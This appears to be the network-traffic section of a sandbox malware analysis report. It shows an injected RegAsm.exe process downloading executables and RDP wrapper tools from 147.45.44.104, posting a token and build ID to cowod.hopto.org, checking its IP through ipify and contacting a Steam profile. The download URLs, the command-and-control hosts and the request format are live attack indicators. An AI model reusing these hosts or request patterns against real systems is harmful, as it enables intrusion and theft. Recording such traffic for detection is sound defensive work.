Sep 27, 2024 01:38:23.214838982 CEST	1.1.1.1	192.168.2.7	0xf660	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:24.736774921 CEST	1.1.1.1	192.168.2.7	0xf0e6	No error (0)	ballotnwu.site	172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:24.736774921 CEST	1.1.1.1	192.168.2.7	0xf0e6	No error (0)	ballotnwu.site	104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:38:47.908890963 CEST	1.1.1.1	192.168.2.7	0x7f72	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:39:02.024305105 CEST	1.1.1.1	192.168.2.7	0xe94e	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:39:02.024305105 CEST	1.1.1.1	192.168.2.7	0xe94e	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:39:02.024305105 CEST	1.1.1.1	192.168.2.7	0xe94e	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:39:02.733339071 CEST	1.1.1.1	192.168.2.7	0x9f4d	No error (0)	hansgborn.eu	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 01:39:02.733339071 CEST	1.1.1.1	192.168.2.7	0x9f4d	No error (0)	hansgborn.eu	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

5.75.211.162

wallkedsleeoi.shop

gutterydhowi.shop

ghostreedmnu.shop

offensivedzvju.shop

vozmeatillu.shop

drawzhotdog.shop

fragnantbui.shop

stogeneratmns.shop

reinforcenh.shop

ballotnwu.site

hansgborn.eu

147.45.44.104

cowod.hopto.org

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49734	147.45.44.104	80	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:38:11.865637064 CEST	195	OUT	GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 01:38:12.492341042 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:12 GMT Content-Type: application/octet-stream Content-Length: 385064 Last-Modified: Thu, 26 Sep 2024 22:09:48 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5dbac-5e028" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ `S(& H.textD `.rsrc@@.reloc@B H0yYYlv^5fH$/Wazz5O7fSl\RBk5EqvBf9v;(F Jgi(BBMs<ub l]Qg\Bc$fVGZ.8lH;!"pUO8Y"d\dD"sm}c#?4?Y#0VSX\|G.g:!rM[~eBpbz{`5\|\|bOGAh}s
Sep 27, 2024 01:38:12.492397070 CEST	1236	IN	Data Raw: 38 a0 ec cc 57 dc 50 61 47 3f b0 95 f7 55 f7 4b 25 ea 39 5d ff 7c 81 f9 ae 87 b6 77 63 5c 7c 9c e0 42 9a aa 4b 3d 9f 44 8d 15 75 0a 10 47 a3 40 b9 1d 71 fd 17 d3 79 30 67 e6 d1 e5 35 d8 ac 09 69 9a 8c a7 f3 13 a1 04 3c 06 74 5a e9 d0 02 51 13 87 Data Ascii: 8WPaG?UK%9]\|wc\\|BK=DuG@qy0g5i<tZQBg*M-jX=dI+:&zIj7eG@p)l{ >@~yM%H};7$lWdTtymhQQ;?(sx_/u9bO[
Sep 27, 2024 01:38:12.492413044 CEST	1236	IN	Data Raw: 78 31 03 30 a5 b4 37 4e b6 91 c7 59 cd cb 89 0b d3 c8 22 34 53 ee 3d 10 65 5d a4 39 04 a2 eb a1 0d 84 e2 79 8e 91 fb 9b 6b 3b b2 ea ca bf de 4e 93 dc d2 e7 1e 7f 0d 78 ab 1f 73 d6 8c 4a 80 66 ab f9 eb 72 71 5f 9b 59 89 38 9d 05 82 fc 42 bb 27 e4 Data Ascii: x107NY"4S=e]9yk;NxsJfrq_Y8B'LUa>bnD8QvG30EAa\qk/. l4J1B2 e?BOcAy;!,ymT9D?]GjFxkh*s:t]
Sep 27, 2024 01:38:12.492436886 CEST	1236	IN	Data Raw: 2a dc 2d ca 53 de de f9 d3 ec 32 ee db 0c 24 de a8 36 f9 15 59 0c 9d 0e 7c bc e1 01 68 d1 8f f1 28 d5 9c 80 cd ca cb 3a 8e e0 26 07 55 56 1f 36 32 e4 f9 40 3e 10 c4 24 77 24 83 5a 5d 22 fb 3c d9 c5 8e 8a 0e 41 1f 03 54 9b 9e fd 03 2e 53 89 8e e9 Data Ascii: *-S2$6Y\|h(:&UV62@>$w$Z]"<AT.S{]j:^Lz8&+-@on.]!~evvI)r:=Q}F_0YYU^gQx4jpm\.H/efiWP-xd:t%$ vV
Sep 27, 2024 01:38:12.492450953 CEST	1236	IN	Data Raw: 6c ee 0d b1 cc 35 1f cd 5e 1e bd e4 5e f6 51 05 9e 69 ec 0a fd 9e c2 e1 e7 88 df 19 95 c7 8a 5a 34 49 f5 e5 05 63 69 93 0b 09 e9 a7 d9 f0 ca c8 bb ae 01 a2 f3 72 b8 9e aa 62 d5 a2 28 1b 0a b2 02 85 d1 15 7a 38 14 f5 23 34 97 a3 04 10 33 32 85 cb Data Ascii: l5^^QiZ4Icirb(z8#432k"!j8KF%};fDGgnXW%{p+~^%N]sD!VClZEK.DBkFq,pb m$~Q>_
Sep 27, 2024 01:38:12.492463112 CEST	1236	IN	Data Raw: 5a 78 5f df b7 cb 18 c9 9c 59 22 d8 53 2d 34 c2 0f 77 7f 9e f0 3a 63 6c ba c3 78 9b b9 d0 e6 72 4e 25 6a cf 46 8a 60 04 1e 38 3a 38 6a 2e 2f dd 9c dc 2b e8 24 8b 32 5c 55 7c a1 b7 c7 99 bc e1 ab 0f 8f e2 8b 93 a0 0d 89 a5 19 4d 2c 18 bc fd 7c b3 Data Ascii: Zx_Y"S-4w:clxrN%jF`8:8j./+$2\U\|M,\|_SEW-gqQS\|8J) qa0P~Pt-Wf\Oei/Y03EE9gittLs!2z4_mb\|Rp0v>Ivfma;
Sep 27, 2024 01:38:12.492474079 CEST	1236	IN	Data Raw: e8 be b1 f8 17 ab 17 1c b4 72 42 e2 39 c3 55 e9 b4 15 cf 9a a6 bd 71 80 27 fd 21 0a 27 96 4f 91 3d fa 07 6c 5b 2b b9 49 28 6b 51 88 c0 45 77 87 17 ec 7d ae 76 6a a0 ec 02 c6 fd af 40 22 1d c9 4e 85 74 c2 d3 e9 02 ad 02 ab 41 7e 72 70 ca 82 3d b5 Data Ascii: rB9Uq'!'O=l[+I(kQEw}vj@"NtA~rp=Kz{PvwQb %z>Z,cUwskY0XYmrQ]S;{z94l?e{1Tw)`r}C1O2R&r/]_BT@YY9WVx=-
Sep 27, 2024 01:38:12.492485046 CEST	1236	IN	Data Raw: 6a 38 d0 9b b2 92 9b 58 5f cb 0c 21 b3 56 3d e1 b0 bd 79 74 b6 b0 7b 55 93 10 57 ca fb ad 27 42 47 64 19 1c a5 7b 49 60 46 6a 08 c4 bd ea 7f 12 33 80 11 8e 49 3f 62 0f 80 51 27 a6 4a 47 ae 52 a9 f7 f1 5f 5b 9a 83 dc e6 75 3b 08 97 58 86 2d 44 17 Data Ascii: j8X_!V=yt{UW'BGd{I`Fj3I?bQ'JGR_[u;X-D?qt&2pW;D{J{q;.xeH)8'd4cQd[sc0[nM"S/L:a1n4a5X,L^Y^IPe~"5^eku
Sep 27, 2024 01:38:12.492496014 CEST	1236	IN	Data Raw: 3a c1 58 8f 61 a3 ce 16 03 bd 72 b4 bf 77 48 36 bf 2e c6 3c 2d 9f 60 ab a5 66 f0 69 e6 5c 7b e6 15 d8 85 11 e5 dc af 6c 63 01 36 c0 28 90 37 5f 8e ce 7c 15 8e 54 3f 48 b0 4f 26 8a bf 0c ee 8e f3 d4 33 e6 9c 97 b0 7a b2 f1 73 7e db e3 3e ac 3e 49 Data Ascii: :XarwH6.<-`fi\{lc6(7_\|T?HO&3zs~>>I'%Vy{_I._\|XEd\;cXN-nY_j;kWpt\|q9IEp%!V^n2h*sno)N@;Og@^qL,bNVU{7TgW8
Sep 27, 2024 01:38:12.492507935 CEST	1236	IN	Data Raw: 63 bf 2f ce a2 73 bb c7 c0 70 32 55 f8 71 75 6c c9 bf dc 3f 9d c3 65 e3 a1 ce d7 0b 5f 4e be a8 cc f7 ff aa dc 7b 0a 19 12 9b aa d3 ca 65 70 85 a5 63 7c 84 5b a2 b7 41 17 a7 c9 ea 97 c6 42 20 80 eb ed b0 e8 7f 12 0a bb 5a a2 3a 2c 41 0c a1 bb b8 Data Ascii: c/sp2Uqul?e_N{epc\|[AB Z:,AR.7!&h6LdO"}D$cA*S65cZJSEJ\|R4T_8ii8\m9~UYl pAb(E+7u#Raev?<&R
Sep 27, 2024 01:38:12.497416973 CEST	1236	IN	Data Raw: 7f 5b 99 b4 1f bb 03 5e d0 76 61 75 88 1b c7 5c b4 b3 3b 26 2b 90 37 40 28 11 8f 63 c0 2e 1d 5d 68 d2 95 2b 5d d5 53 73 84 43 e8 b0 50 2c d8 a7 0d 67 53 e7 e8 e6 b8 cc 25 1c 5f 34 05 a2 df 8b ed 77 2a b9 24 86 55 d7 dc bc a6 4f 23 2d 85 79 b1 ac Data Ascii: [^vau\;&+7@(c.]h+]SsCP,gS%_4w$UO#-yV;5_@ISq)+LRWxLBwQ0J$Jw0$IV?:~uA<ENssRkBUvnz]bHB:;P
Sep 27, 2024 01:38:14.867991924 CEST	192	OUT	GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 01:38:15.051584959 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:14 GMT Content-Type: application/octet-stream Content-Length: 413224 Last-Modified: Thu, 26 Sep 2024 22:09:34 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5db9e-64e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `;S@((&`: H.textD `.rsrc@ @@.reloc`&@B <H0^8=.Qv A3[RJ_f9\lvC#SsnB~E~i7}+V#8f#XWb(<O1$=UN8)LL(K,r%9LY=0T4&d.(U'="(>d+92p81Pa\q]X/a@0CPQBv6le24I3PC:v}QwpS(AQg'N_XmvgJ/J6^D^MIO45+e^
Sep 27, 2024 01:38:17.053884029 CEST	188	OUT	GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 01:38:17.237827063 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:17 GMT Content-Type: application/octet-stream Content-Length: 73728 Last-Modified: Thu, 26 Sep 2024 23:36:16 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5eff0-12000" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8f 99 ab c7 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 06 01 00 00 18 00 00 00 00 00 00 fe 23 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 23 01 00 4f 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0# @@ `#O@` H.text `.rsrc@@@.reloc`@B#H&-(#(6\|(0Vs1rp((2Js1s3(4Zrp((oE(N:rp(r0p((O(rp((rp(oE:rp(rp(rp({rp((XoY(Zb:rZp(o[*0n(s(rpo(sooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49743	147.45.44.104	80	6956	C:\ProgramData\CFHIIEHJKK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:38:17.891561985 CEST	94	OUT	GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1 Host: 147.45.44.104 Connection: Keep-Alive
Sep 27, 2024 01:38:18.604265928 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:18 GMT Content-Type: application/octet-stream Content-Length: 1785344 Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f55533-1b3e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext\|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`\|@@p@@
Sep 27, 2024 01:38:18.604288101 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
Sep 27, 2024 01:38:18.604299068 CEST	448	IN	Data Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40 Data Ascii: @B@C@B@BH@C\|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
Sep 27, 2024 01:38:18.604309082 CEST	1236	IN	Data Raw: 58 12 40 00 08 00 01 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 02 00 34 00 64 50 40 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 39 00 7c 50 40 00 0b Data Ascii: X@@Self4dP@ClassName@Self@@9\|P@ClassNameIs@Self@Name+Q@ClassParentX@Self)(T@ClassInfo@Self,TQ@InstanceSize@
Sep 27, 2024 01:38:18.604326963 CEST	1236	IN	Data Raw: 4d 65 73 73 61 67 65 02 00 02 00 3f 00 4c 54 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 03 00 00 00 00 00 08 00 02 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 2b 00 24 51 40 00 0b 4e Data Ascii: Message?LT@DefaultHandler@SelfMessage+$Q@NewInstance@Self,@Q@FreeInstance@Self'\|Q@Destroy@Self@@TObjectd@System@
Sep 27, 2024 01:38:18.604340076 CEST	1236	IN	Data Raw: 08 56 49 6e 74 65 67 65 72 02 00 54 11 40 00 08 00 00 00 02 07 56 53 69 6e 67 6c 65 02 00 78 11 40 00 08 00 00 00 02 07 56 44 6f 75 62 6c 65 02 00 88 11 40 00 08 00 00 00 02 09 56 43 75 72 72 65 6e 63 79 02 00 14 1e 40 00 08 00 00 00 02 05 56 44 Data Ascii: VIntegerT@VSinglex@VDouble@VCurrency@VDate@VOleStr@VDispatchl@VError@VBoolean@VUnknownd@VShortInt@VByte@VWord@
Sep 27, 2024 01:38:18.604351997 CEST	1236	IN	Data Raw: 25 78 c4 44 00 8b c0 ff 25 74 c4 44 00 8b c0 ff 25 70 c4 44 00 8b c0 ff 25 6c c4 44 00 8b c0 ff 25 68 c4 44 00 8b c0 ff 25 64 c4 44 00 8b c0 ff 25 60 c4 44 00 8b c0 ff 25 08 c4 44 00 8b c0 ff 25 5c c4 44 00 8b c0 ff 25 58 c4 44 00 8b c0 ff 25 54 Data Ascii: %xD%tD%pD%lD%hD%dD%`D%D%\D%XD%TD%D%D%D%PD%LD%D%D%D%HD%DD%@D%<D%8DS$DTBD$,t\$0D[@%4D
Sep 27, 2024 01:38:18.604362011 CEST	328	IN	Data Raw: fc 8b 0d 3c 7a 44 00 29 c8 01 ca eb b9 c3 90 53 8b d8 e8 8c ff ff ff 6a 04 68 00 10 00 00 68 f0 ff 13 00 6a 00 e8 ed fb ff ff 85 c0 74 4d 8b 15 28 7a 44 00 8b c8 c7 01 24 7a 44 00 a3 28 7a 44 00 89 51 04 89 02 8b d0 81 c2 f0 ff 13 00 8b ca 83 e9 Data Ascii: <zD)SjhhjtM(zD$zD(zDQ+<zD+8zD[3<zD3[=MpDt=)=xDu jD3tjlD3uSVWUNjhVj#
Sep 27, 2024 01:38:18.604372978 CEST	1236	IN	Data Raw: 89 14 24 8b 50 04 89 54 24 04 8b 50 0c f6 c2 08 75 1a 68 00 80 00 00 6a 00 56 e8 b8 fa ff ff 85 c0 74 04 33 ff eb 3f 83 cf ff eb 3a 8b de 8b ea 83 e5 f0 33 ff 6a 1c 8d 44 24 0c 50 53 e8 19 fa ff ff 68 00 80 00 00 6a 00 53 e8 88 fa ff ff 85 c0 75 Data Ascii: $PT$PuhjVt3?:3jD$PShjSut$;v+uD$$$T$PD$]_^[SVWU;;v$jD$PD$P{\|$upd$
Sep 27, 2024 01:38:18.604383945 CEST	1236	IN	Data Raw: ff ff c6 05 34 7a 44 00 00 5b c3 56 57 8d 3c cd c4 7a 44 00 8b 77 04 8b 46 04 89 47 04 89 38 39 c7 75 17 b8 fe ff ff ff d3 c0 21 04 95 44 7a 44 00 75 07 0f b3 15 40 7a 44 00 bf f0 ff ff ff 23 7e fc 89 fa 29 da 74 1f 8d 04 33 8d 4a 03 89 48 fc 89 Data Ascii: 4zD[VW<zDwFG89u!DzDu@zD#~)t3JHT0rd7KN4zD_^[[+1PSMpDuajBt,J@At1[KZJQS1[tBJHA19Su
Sep 27, 2024 01:38:18.609252930 CEST	1236	IN	Data Raw: 0f f4 ff ff 5a 59 89 c8 c1 e8 02 01 c8 31 ff 29 d0 83 d7 ff 21 f8 8d 84 02 d3 00 00 00 25 00 ff ff ff 83 c0 30 8d 55 04 29 c2 77 0b 83 24 2e f7 83 c5 04 eb 1e 90 90 89 54 2e fc 8d 7a 03 89 7c 30 fc 89 c5 81 fa 30 0b 00 00 72 07 01 f0 e8 00 f4 ff Data Ascii: ZY1)!%0U)w$.T.z\|00rn4zD]_^[4zD1)!RZt,vP]_^[^[%1SX`,sx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49747	45.132.206.251	80	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:38:20.980112076 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3189 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 01:38:20.980485916 CEST	3189	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------FIJECAEHJJJKJK
Sep 27, 2024 01:38:21.731683016 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 23:38:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49762	104.26.12.205	80	6956	C:\ProgramData\CFHIIEHJKK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:39:02.031713963 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 27, 2024 01:39:02.517153025 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:39:02 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c97174c5b8e4308-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 27, 2024 01:39:02.564635038 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Sep 27, 2024 01:39:02.687342882 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:39:02 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c97174d5ce74308-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49710	104.102.49.254	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:34 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:34 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 23:37:34 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=aa1f17f5e4b62a7b27c75820; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
